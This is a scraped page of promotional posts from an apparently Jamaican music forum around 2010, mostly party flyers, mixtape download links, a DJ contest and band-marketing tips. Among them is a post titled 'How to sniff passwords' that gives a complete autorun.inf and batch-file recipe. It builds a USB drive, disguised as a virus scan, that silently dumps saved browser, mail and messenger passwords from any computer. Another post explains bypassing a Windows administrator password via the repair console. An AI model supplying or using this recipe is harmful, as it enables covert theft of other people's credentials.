Forum: Promote

Promote new releases, new/upcoming artistes, events, contests, websites, etc...
.::SKiN DEEP::.
------------------------
Short Skirt Edition
------------------------

Friday, August 13th

$13,000 prize to the girl in the sexiest short skirt!

. Mix Drink Inclusive

$1000 Prepaid
$1300 @ the Gate
$1800 VIP
------------------------
OUTLETS
. Genius Pharmacy(Port Henderson) 
. Xtras (Mall Plaza . Hwt)
. Spicy Couture (Mall Plaza . Hwt)
------------------------
MUSIC BY:
. ZJ Chrome
. Raz & Biggy
. DJ Surge

-- Edited by zibba101 on Thursday 12th of August 2010 09:24:00 AM

-- Edited by zibba101 on Thursday 12th of August 2010 09:26:11 AM
BRAND NEW SINGLE FROM D'MIXTAPE!!!!

STYLE A STYLE - D'MENTIA & PROTOJE - D'MENTIA RECORDS
http://www.mediafire.com/?qkwzycg02nn

D'MIXTAPE
http://www.mediafire.com/?ync4z1yktzu

New Unstoppable Fyah Grab it

cp

http://www.mediafire.com/?9wocddfl7nphkfw

MAKE MONEY.jpg

POWER OF THE PENNIES (GO LIKE IT ON FACEBOOK)

FOLLOW & SHARE IT TO DI WORL' WE SAY

WEBSITE COMING SOON

Basic Info

Founded:
July 30, 2010

Detailed Info

http://www.powerofthepennies.com

Company Overview:
We search the stock market for quality stocks at a reasonable price. we operate in New York and South Florida.

Mission:
To make money.

Products:
Stocks

Phantom Ft. Bris & Channel - Hot Gal (Mad Collab Riddim) Check This Out It Sickkkkkkkkkkkkkkkkkkkkkk
link to download  http://usershare.net/blackribbon/7vycopin7po5
HONOREBEL - NUH BETTER THAN YOU (MAIN, CLEAN & INSTR.) - FACEBOOK RIDDIM - TRACKJUNKIES

http://usershare.net/0jmm4lh95yv8
DJ GRIM MADIN UP THE PLACE LIVE ON www.ramjamxrated.com USE THE PLAYER IN TOP RIGHT CORNER AND MUTE PLAYER IN THE BOTTOM LEFT CORNER>>>>>>>
BRAND NEW COLLIE BUDDZ "100 dollars bag" pon my blogpage http://mofuture.blogspot.com!!!!! Pree dis!!!
RRRRR!

My blog is dedicated to reggae newz but, yuh zeeit, in a DIFFERENT way!

It's for the hotskulls who tired fi hear always bout the same artists...

MO' FUTURE MI SEH!!!

So go pree: www.mofuture.blogspot.com

Yeah,man.

Dat you fi go do...

How and when do I enter...just simply create a 15 min mix and submit it to MZJA PROMOTIONS. Note that Entry date closes on August 2nd following after each mix will be posted to be voted amongst. The highest 8 mixes will therefore advance as competitors who will battle in the synergy.

Final Date for is on the August 8th 2010

When is the mix-off? ...The Ultimate mix-off will take place on Saturday August 14 @ 4pm sharp.

Whats the format...Each DJ goes head to head in a knock out scenario from which the final 2 will be selected to face off for the prize. When the final 2 is selected

They will be given 10mins to prepare before they start.

What can I play...You arent limited, you can mix edit any genre of music, old school, new school, any era... Please NOTE: NO DUBS ARE ALLOWED.

How much time is allocated to each DJ ?? ...Each DJ is given 15 mins to mix,

Can I mix special effects in my set? ...No, absolutely no special effects will be allowed in the competition doing this will assist in proving each mix is done by the DJ and is live..

Can I chat on the mic during my set?...No, absolutely not.

How is the winner of the mix-off determined?...The winner will be determined by the MZJA member polls (you will therefore be informed where the voting polls are located by the specific moderator).

What determines which DJ the MZJA member votes for...it's very simple...the DJ with the most perfect mixing wins..

What is the prize $300 USD

Again submit mixes to MZJA PROMOTIONS  <<<< CLICK NAME

Enjoy :)

Download Link : http://www.mediafire.com/?4l2al12d1qp8h42

Look out for new label Full Clip Music

August 2, 2010
Started By 2461 Comments

Check Out This New Artiste Who Goes By The Stage Name " Faatal " With Debut Single Titled " Kingston Clause " Which Has Been Getting Alot Of Plays N Repeat Requests At Jamaica's Most Popular Clubs And Parties!!! Take A Listen N Comment If You Like!!!!!!!!!!

Contact Mangement At: 1-876-898-3511

Youtube Link

http://youtu.be/nq3Vcqq1S78

Download Link

http://hulkshare.com/26t5qpwlxs6k

-- Edited by 246 on Monday 6th of June 2011 05:35:41 AM

THE SONG HERE:  http://www.mediafire.com/?t8r68jg63i456fg

cp

THE INSTRUMENTAL http://www.mediafire.com/?6jblpoxjl6qbbke

CHECK OUT DA YUTE YAH FROM GAYLE ST. MARY CALLED "IMMARTEL (TALIBAN RIDDIM)" BEAT CREATED BY DJ TROPICAL.

FOR MORE INFO CALL 406-6811 0R EMAIL ME AT firelionrecords@gmail.com!

-- Edited by jettropical on Saturday 31st of July 2010 09:57:07 PM

Dallaz---D BADDEST YOUNG ARTIST

August 2, 2010
Started By dallaz1 Comments

http://www.mediafire.com/?c44i0hz51y4tain

CAN SOMEBODY PLEASE HELP ME OUT

Making a Crest

July 27, 2010
Started By MonEyBeLLy0 Comments
Okay MZJA DESIGNERS...i have a offer here that you might refuse...but i hope u take up the challenge...ok let's get down to business...i'm lookin for somebody who can design a crazy crest...these Crest will signify and identify a group of friends that goes by the name of 3rD Street/3rD Street Family. I just want a gangsta lookin Crest with 3rD Street on it. This Crest will be printed to go on a car windshield and/or on shirts. So test your skills...i know there r great designers on this site...so all r welcome to participate the one wit the best crest will get a $200 digicel credit and all i ask is to just do a crest and post the pic here...need one that looks gud when printed big...the person wit the crest that wins the $200 i will just ask u to email the photoshop file/any other photo editing file and the finished pic of the crest to me...thanks in advance. This shouldn't be hard as mzja have their own crest easy $200 credit.
MALDINI - GYALL MI LIKE THAT - SEX APPEAL RIDDIM .mp3

Just Check it Out and leave a comment respects

-- Edited by HighExpectations_4life on Friday 11th of June 2010 09:45:35 PM

-- Edited by HighExpectations_4life on Friday 11th of June 2010 09:47:17 PM

-- Edited by HighExpectations_4life on Friday 11th of June 2010 09:48:36 PM

1. Join a social network
MySpace and its ilk act as a one-stop band advert where you can upload anything you want: photos, songs, video, text and more. Limit yourself to two or three social networks though you don't want to spread yourself too thinly.

2. Set up a website
As good as MySpace and its mates are, having your own website too looks more professional. Websites are cheap to host and easy to build so there are no excuses. Remember to update it as often as your social network profile though...

3. Keep your website/profile current
Make sure that you post regular updates and news stories. Add new photos frequently and generally keep your profile looking busy. That way you'll be seen as a serious, enthusiastic, up-and-coming act. Regular profile/website updates will also keep things interesting for returning fans.

4. Write a decent biography
An artist biog should be concise, informative and interesting. People (particularly venue staff) don't want to know that your band was formed "in the first year of uni by songwriter Joe Bloggs and producer John Smith" cut out the background and write something that's a bit different.

"As good as MySpace and its mates are, having your own website too looks more professional."

5. Get some good photos
Top-notch imagery is crucial if you want to be noticed online. Try to present a uniform 'look' that fits with your music. There are plenty of aspiring photographers about who will be willing to take press or live photos of you and/ or your band for little or no money. Take advantage of them!

6. Offer your songs for free download
If you're an independent act, your goal is to get your music heard as much as possible. Be aware that people are much more inclined to listen if you offer the occasional track for free. If you do decide not to give away your music then at least offer streaming full-length versions of your tracks rather than short clips.

7. Interact with other artists
Networking with other artists and bands by keeping in regular contact and giving feedback on their music means you're likely to find gig partners and be asked to play support slots. Musicians are also generally more interested as fans when it comes to independent music like yours.

8. Dedicate some time to your fans
Replying to mails and friend requests can sometimes be a chore but try to avoid blanket "thanks for the add" messages. If you keep things personal you're far more likely to be remembered and if your audience likes you, they'll be predisposed to like your music.

9. Avoid spamming
While it's important to keep in touch with your fans, repeated spam is annoying, so reserve mass messaging for special events. It's far more effective to tailor your messages and gig invites to individuals or small groups of people there's no point telling someone from Land's End that you're gigging in Dundee.

10. Make sure your social network friends are valuable
It can be tempting to add every person you come across, but when it comes to MySpace, high profile views is what makes you look good and not your friend count. Make sure you add only valuable friends who you think will like your music and visit your profile.

"There's no point telling someone from Land's End that you're gigging in Dundee."

11. Do something to stand out from the crowd
The sad truth is that the quality of your music won't always be enough to get you noticed. Try doing a blog, a quiz, a gimmick anything that will make your website or profile a bit different and interesting.

12. Get a short, snappy URL
Your website and your social network profiles will need a short snappy URL (web address) that's easy to remember. Bear in mind that you might be shouting your URL through the PA at a noisy gig to apathetic, drunken punters keep it fairly obvious and make sure the spelling is logical.

13. Get your songs on iTunes
Nothing says professionalism like having your songs available to buy on the world's largest online music store. Websites such as CD Baby can get your tracks online for a small charge you can then link to your songs in the store from your website/profile.

14. Keep your social profile concise
There are all manner of widgets and plug-ins available for social networks, but while they may look flashy, having too many may obscure the important info on your profile. They can also make your profile slow to load remember that people generally don't have much patience on the net.

Instructions

Difficulty: Moderate

Things Youll Need:

• Windows CD-ROM
  • PC that supports a bootable CD-ROM

Re-set Your Admin Password With a Bootable Windows CD-ROM

Step 1:
Modify your PC's BIOS so that it will boot from the Windows CD-ROM. Insert the Windows CD into the drive and boot up the PC. Watch the screen messages until you see the prompt: "Press any key to boot from CD."

Step 2:
Go through the boot-up process until you get to the "Setup" screen where you have the option to install or repair. Choose the option to repair and press "R" which will launch the repair process. As the repair runs, Windows Set up will do a check on your disks and then begin to copy files. This may take a few minutes. Your PC will then re-boot itself automatically.

Step 3:
Open a command prompt after your PC reboots and resumes set-up. Here's how:

* In Windows 2000, wait until the point where it's registering components, and then pres the "Shift + F10" keys.

* In Windows XP, watch the bottom left-hand side of your screen until you see a progress bar that reads: "Installing devices," and then press the "Shift + F10." This will open a command console.

Step 4:
You can now gain access to your Control panel. Here's how:

* In Windows 2000, enter this command: control.exe

* In Windows XP, type: nusrmgr.cpl

* Press "Enter," and you will have access to the control panel.

Step 5:
Use the tools provided to reset your passwords. When you are done, close the control panel and then type in "Exit" to close your command console. Allow the repair to complete as usual. You will then be able to log on using your new password.

Alternative ways to Access your PC

Step 1:
Log into another administrative account on the same computer, if you have one. Reset the password for the account whose admin password you lost. Log out and log-into your administrative account. This simple method of resetting an administrative password makes it highly advisable to have two admin accounts on a PC if there is a chance you may forget the password.

Step 2:
Disconnect your hard drive and re-install it on another PC as a slave drive. Using this method, you will be able to access the files that you had stored on the account whose admin password you lost.

Step 3:
Re-set your password using third-party software such as the Offline NT Password and Registry Editor by Petter Nordahl-Hagen (See Resources below). This application gives you access to accounts on Windows 2000, Windows XP, Windows Vista, Windows Server 2003 and NT systems.

Tips & Warnings

• Depending on the age of your Windows CD, you may need to choose "Install" instead of "Repair" in step #3. If "Repair" does not work, just do the processsover with "Install."
  • When your PC automatically reboots, do not press any key so as to boot once again from the CD. Your PC automatically resume set-up.
Step :1

Copy this code into notepad (copy and paste), then save it as "desktop.ini"

[.ShellClassInfo]
IconFile=%SystemRoot%\system32\SHELL32.dll
IconIndex=127
ConfirmFileOp=0

[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
Attributes=1
IconArea_Image="your_picture.jpg"
IconArea_Text="0xFFFFFF"
VeBRA sources - don't delete the tag above, it's there for XXXXX purposes -
[ExtShellFolderViews]
{BE098140-A513-11D0-A3A4-00C04FD706EC}={BE098140-A513-11D0-A3A4-00C04FD706EC}
{5984FFE0-28D4-11CF-AE66-08002B2E1262}={5984FFE0-28D4-11CF-AE66-08002B2E1262}

[{5984FFE0-28D4-11CF-AE66-08002B2E1262}]
PersistMoniker=Folder.htt
PersistMonikerPreview=%WebDir%\folder.bmp

2.Put "desktop.ini" file onto your flash drive and replace "your_picture" with the
name of the picture you want to use leaving the .jpg extention the same.

3.Now copy the picture that you want to use onto your flash drive.

4.Refresh (F5) ..and enjoy with new background..

How to sniff passwords

January 18, 2010
Started By ~XIV~15 Comments
ok if anyone asks i didn't post this ok lol

As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit.

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 v6.0

Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more

PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

Here is a step by step procedre to create the password hacking toolkit.

NOTE: You must temporarily disable your antivirus before following these steps.

1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.

ie: Copy the files mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad and rename it from

New Text Document.txt to autorun.inf

Now copy the autorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

save the Notepad and rename it from

New Text Document.txt to launch.bat

Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and youll see the stored passwords in the .TXT files.

This hack works on Windows 2000, XP and Vista

NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

-- Edited by bLaCkBeatZ (Mod) on Monday 18th of January 2010 02:17:44 PM
KAMOUFLAGE 3G 

http://www.sendspace.com/file/bdev1k

Deh yute yah talented!!!! From western park, may pen.... Take a few mins annd dload and listen!! Support please!!

Download Link: http://www.mediafire.com/?mmm4nzmmzyg

Jwhizz Designz||||| Facebook.com/jwhizz

HYPE TV VTX TOP TEN VIDEO COUNTDOWN :: TEXT CONFLICT - HOW CAN THIS BE to (444 2453) TO VOTE

Nuff Respect!!

For Dubz & Jingles & Drops ! From "Conflict" Inbox Mi!

Eazy!

-- Edited by Dj_Mega on Saturday 24th of July 2010 06:14:14 AM

I apologize. This is a double posting.  I initially posted in the wrong room, but don't know how to delete the first post. If anyone could message me I would greatly appreciate it.

Enjoy.
Drake Remix posting tomorrow.

K'Naan - Waving Flag Grindhouse Reggae Remix with DJ intro
http://www.mediafire.com/?lbtltyetyyz

K'Naan - Waving Flag Grindhouse Reggae Remix
http://www.mediafire.com/?ygjnmjnzezz

This mixtape is result of the many years cooperation between Slovenian selector Pupa Robbie and Slovenian/Austrian artist Bomba Samurai. In this mixtape Bomba Samurai presents himself with his two bands, duets, solo and dubplate tunes. In this mixtape we can hear tunes in different styles like roots reggae, ska, dancehall. This mixtape predicts his first solo EP release wich will be produce by Pupa Condor. Some songs is in german language but majority is in english.

http://soundcloud.com/dubsystem-sound/puppa-robbie-bomba-samurai-2010-mixtape-rbs

Tracklist:

Stay Humble - ls. Sue Sound Circus
Socializer - ls.Millions of Dreads
Schwoaza Man - ls Millions of Dreads
Nuff A Dem - ls.Sue Sound Circus
Free Buju!!!
Gimme The Cheeba - ls. King David (Dubplate special)
Top A Di Top
Top A Di Top (Dubplate)
Wickedest Wine - ls Milli Chab
Loco Loco - ls.El Condorsito
Live Longer (Dubplate)
Runaway (Dubplate special)
Long Time Soldia (Dubplate)

I-RAZOR aka BOMBA SAMURAI was born as konstantin z. in innsbruck (austria) in the year 1983. two years later he moved with his family to carinthia/koroska in the south of austria. he grew up bilingual: slovenian and german in the south-carinthian slovenian minority. the first steps into di reggae world he did wid 14 years, writing some reggae and dancehall lyrics and sing dem with a small band (longside mc sthix (dragonfyahsound)) called "babylon crisis". he improved his lyrics and some years later 2004 he founded wid a friend (selecta izaak) the reggae sound system "dragonfyahsound". they started to play at parties all over austria, slovenia and italy. one year later he joined the skapunkreggae band "sue sound circus", and in december 2006 he joined also the reggae band "millions of dreads". in the last years he performed allready at big festivals like ROTOTOM Sunsplash Italy, CHIEMSEE Reggae Summer Germany or SOCA Riversplash Slovenia. so dem tings gwaan str8!!! I-RAZOR is composing ska, reggae and dancehall tunes. with his lyrics he is trying to make people rise up to fight against the opression of minorities, racism and fashism! jus spreading the message of love and understanding all over! DISKOGRAPHY: 2007: sue sound circus EP - "blazin through the streets" 2008: millions of dreads album - "hands up" (Rebeat) 2010: sue sound circus album - "Rockin Steady" (Hoanzl) millions of dreads EP - "Love is the Way" (M.O.D. Music) www.myspace.com/i-razor www.myspace.com/dragonfyahsound www.myspace.com/suesoundcircus www.myspace.com/millionsofdreadsmusic www.millionsofdreads.at

Read more: http://www.myspace.com/i-razor#ixzz0uOsQGH1K

If you are interested for dubplate contact him on myspace or facebook.

BLESS !!
i will be at the o2 academy brixton with legendery super star BUNNY WAILER on the 1|8|10 the 4|8| we will be in france.13|8|10 we will be in canada 25|8|10 we will be in sweden, and on the 30|8|10 we head to africa zimbabwe to be exact the final stop will be in miami 7|9|10 on my birthdaycp
klasyk-promotions--- would like to invite yall to onyx lounge--152-34, rockaway blvd Ja queens nyc--- on july 24th,2010----for a night called--best of both worlds---"old vs new"-----music by-"fatta diamond from stinga movements--93.5 fm--" &&& "dj polish" from "king midas"-
--ladies $1.00....b4 12:00....((((yesss dats right ))))....wan dalla!....$20 after.....pure----((((fire))))----click link to see commercial---> http://www.youtube.com/watch?v=SN97z2ao9ZU

py1dwinewinepy1
AIDONIA - BUBBLE AN TUN

KARTEL - LIKE A JOCKEY

PREE AN COMMENT

DJ BAHNZ 15 min MIX

July 19, 2010
Started By miccetro0 Comments
http://www.mediafire.com/?jmdnxc3lytj973b
«First  <  126 27 28 29 3098  >  Last»  | Page of 98  sorted by